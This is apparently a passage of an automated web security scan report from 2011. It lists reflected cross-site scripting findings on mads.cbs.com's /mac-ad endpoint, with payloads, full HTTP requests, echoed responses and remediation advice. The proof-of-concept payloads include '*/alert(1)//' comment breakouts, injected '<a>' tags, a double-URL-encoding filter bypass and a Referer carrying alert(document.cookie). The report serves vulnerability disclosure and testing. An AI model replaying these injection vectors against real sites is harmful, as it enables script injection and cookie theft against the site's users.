/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3Acce01*/alert(1)//1575e9d6777&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the NODE request parameter is copied into a JavaScript inline comment. The payload 901dd*/alert(1)//13d918e3a50 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806901dd*/alert(1)//13d918e3a50&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:45 GMT
Server: Apache/2.2
Content-Length: 1172
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:35:45 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806901dd*/alert(1)//13d918e3a50&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the NODE request parameter is copied into the HTML document as plain text between tags. The payload e0b42<a>621aa8019b1 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806e0b42<a>621aa8019b1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
Response
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806e0b42<a>621aa8019b1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS=' ...[SNIP]...
The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload b9251*/alert(1)//b4f70b6b83f was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=b9251*/alert(1)//b4f70b6b83f&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:05 GMT
Server: Apache/2.2
Content-Length: 1179
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:05 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=b9251*/alert(1)//b4f70b6b83f&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.w ...[SNIP]...
The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92086%2527%253balert%25281%2529%252f%252f2cd17c06c35 was submitted in the PAGESTATE parameter. This input was echoed as 92086';alert(1)//2cd17c06c35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the PAGESTATE request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=92086%2527%253balert%25281%2529%252f%252f2cd17c06c35&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:03 GMT
Server: Apache/2.2
Content-Length: 1225
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:03 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=92086%2527%253balert%25281%2529%252f%252f2cd17c06c35&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT ...[SNIP]... sion%253db&ucat_rsi=%2526&pg=&t=2011.02.06.20.34.03/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />'); ;window.CBSI_PAGESTATE='92086';alert(1)//2cd17c06c35';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c17-ad-xw1.cnet.com::2603727760 2011.02.06.20.34.03 *//* MAC T 0.0.3.3 */
The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload da453<a>3c66de957c3 was submitted in the POS parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100da453<a>3c66de957c3&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100da453<a>3c66de957c3&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='80' CNET-PTYPE='6711' POS='100da453a3c66de957c3' NCAT='19650:19806:' CNET-PARTNER-ID='1' DVAR_P ...[SNIP]...
The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload dba23*/alert(1)//ccaf888c20c was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711dba23*/alert(1)//ccaf888c20c&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:47 GMT
Server: Apache/2.2
Content-Length: 1173
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:47 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711dba23*/alert(1)//ccaf888c20c&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default a ...[SNIP]...
The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload 1857c<a>4edf02830e0 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=67111857c<a>4edf02830e0&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
Response
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=67111857c<a>4edf02830e0&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT M ...[SNIP]...
The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload 37931<a>6c42c321af7 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=16437931<a>6c42c321af7&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=16437931<a>6c42c321af7&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: C ...[SNIP]...
The value of the cookiesOn request parameter is copied into the HTML document as plain text between tags. The payload 177ed<a>5d4faf2f940 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1177ed<a>5d4faf2f940&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1177ed<a>5d4faf2f940&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='1 ...[SNIP]...
The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload 89391*/alert(1)//284c42343f2 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=189391*/alert(1)//284c42343f2&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:35:48 GMT Server: Apache/2.2 Content-Length: 1146 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:35:48 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=189391*/alert(1)//284c42343f2&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
1.150. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://mads.cbs.com
Path: /mac-ad
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6ebb1<a>851735ff48a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1&6ebb1<a>851735ff48a=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1&6ebb1<a>851735ff48a=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO _RGROUP *//* M ...[SNIP]...
1.151. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mads.cbs.com
Path: /mac-ad
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 8e53e*/alert(1)//a041a4ab76d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1&8e53e*/alert(1)//a041a4ab76d=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:37:33 GMT Server: Apache/2.2 Content-Length: 1156 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:37:33 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1&8e53e*/alert(1)//a041a4ab76d=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload e876d*/alert(1)//2d9085e2f91 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859e876d*/alert(1)//2d9085e2f91&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:36:08 GMT Server: Apache/2.2 Content-Length: 1147 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:36:08 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859e876d*/alert(1)//2d9085e2f91&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the x-cb request parameter is copied into the HTML document as plain text between tags. The payload bca9a<a>70ad7b6acbd was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
